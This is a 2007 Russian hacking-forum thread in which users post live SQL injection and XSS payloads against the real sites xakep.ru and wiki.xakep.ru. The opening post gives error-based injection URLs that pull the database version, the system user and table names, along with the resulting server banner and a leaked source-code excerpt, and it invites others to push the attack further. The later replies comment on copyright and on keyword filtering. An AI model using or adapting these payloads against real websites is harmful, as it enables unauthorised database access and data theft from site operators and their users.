Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   хакер.ru (https://forum.antichat.xyz/showthread.php?t=50584)

halkfild 05.10.2007 22:08
хакер.ru
 
вот подборка по ресурсу ХАКЕР.ru.. мо что-то интересное получится

SQL-injection

скуля вполне рабочая вот только с таблици достать не получилось.. так версия, юзер и тд
Цитата:
http://www.xakep.ru/local/admin/voter.asp?action=remove&filedir=1'+or+1=(cast(@@VE RSION+as+nv

archar))--&site=xakep
Microsoft SQL Server 2005 - 9.

Цитата:
http://www.xakep.ru/local/admin/voter.asp?action=remove&filedir=1'+or+1=(cast(syst em_user+as+

nvarchar))--&site=xakep
system_user

ну вот что-то посерьезнее вытянуть очень тяжело
тут еще и второй параметр уязвим))

http://www.xakep.ru/local/admin/voter.asp?action=remove&filedir=1'+or+1=(cast((SEL ECT+TOP+1+T

ABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)+as+nvarc har))--&site=xakep
http://xakep.ru/local/admin/voter.asp?action=add&filedir=38150&site=xakep'%20o r%201=@@version
--

Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86) Mar 23 2007 16:28:52 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

Server Error

Цитата:
http://wiki.xakep.ru/Pages.aspx?Cat=%ce%ef%e5%f0%e0%f6%e8%ee%ed%ed%fb%e 5%20%f1%e8%f1%f2%e5%ec

%fb'+and+1=1--
http://wiki.xakep.ru/Pages.aspx?Cat=%ce%ef%e5%f0%e0%f6%e8%ee%ed%ed%fb%e 5%20%f1%e8%f1%f2%e5%ec

%fb'%20and%201=1--
http://wiki.xakep.ru/Pages.aspx?Cat=%c8%ed%f2%e5%f0%ed%e5%f2%3Cb%3Eaaa% 3C/b%3E
PHP код:
Line 58:             if (Request["Cat"] != null ? !Request["Cat"].Equals("-") : false
Line 59:                 category Request["Cat"].ToString();
Line 60:             DataTable ds Pages.Instance.DataPages((SessionFacade.Published 

0), category);
Line 61:             AllRows ds.Rows.Count;
Line 62:             DataGrid1.DataSource ds.DefaultView;
Source Filed:\morazm\www\wiki\xakep\Pages.aspx.cs    Line60 
з.ы. когда-то мыла можно было изменять через ксс потом прикрили... теперь вот опять можна
http://wiki.xakep.ru/Profile.aspx
з.з.ы еще где то в теме с пасивками лежит пасивка на хакере /*раньше работало)*/

тут еще с типами боянчег
Цитата:
http://www.xakep.ru/articles/magazine/archive.asp?magazine=xa'--&year=2007

кто сможет раскрутить на что-то нормальное (:

guest3297 05.10.2007 22:10
копирайты?

halkfild 05.10.2007 22:12
все что я постил все нашел сам..
идею с cast от тебя..

поиск не юзал.. а надо было бы(( если все написаное уже было на форуме /*хотя я такого не видел, и не только я*/
и все думают что она не нужна, прошу удалить тему!

fly 06.10.2007 03:40
Ничего особого, но прикольно. Пусщай теперь хакер про свои баги пишет!)))

blackybr 06.10.2007 14:04
На сfмом сайте 5-6 скулей.
В каждой из них фильтуются "tables","select", information_*
Полный бесперспективняк. по крайней мере этих местах


Время: 11:38